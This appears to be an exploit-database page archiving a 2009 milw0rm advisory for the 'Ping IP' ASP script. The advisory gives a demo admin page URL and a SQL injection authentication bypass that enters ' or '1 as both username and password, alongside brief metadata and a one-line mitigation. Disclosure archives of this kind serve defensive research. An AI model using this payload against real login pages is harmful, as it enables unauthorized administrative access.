header-logo
Suggest Exploit
vendor:
Ping IP
by:
ByALBAYX
8.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Ping IP
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Ping IP (Auth Bypass) SQL

A vulnerability in the Ping IP application allows an attacker to bypass authentication by entering ' or '1 as the username and password.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

#----C4TEAM.ORG---ByALBAYX----C4TEAM.ORG----#
#############################################
[~]Author   : ByALBAYX

[~]Website  : WWW.C4TEAM.ORG
#############################################
[~]Ping IP (Auth Bypass) SQL

[~]Script        : Ping IP

[~]Price         : $59   :) 

[~]Demo          : http://warhound.com/ASP/ping/admin.aspx

[~]Details       : http://warhound.com/asp/products.htm
#############################################
[~]Admin     :  [PATH] /ping/admin.aspx


[~]username  : ' or '1

[~]password  : ' or '1

 :) 
#############################################
[~]İşinize Baqın :=)

[~]Greetz For C4TEAM Members
#############################################
Derdimi dinledim, derdimden İĞRENDİM...
Onun derdini gördüm, derdime İMRENDİM...
----------
FilistiN

# milw0rm.com [2009-01-16]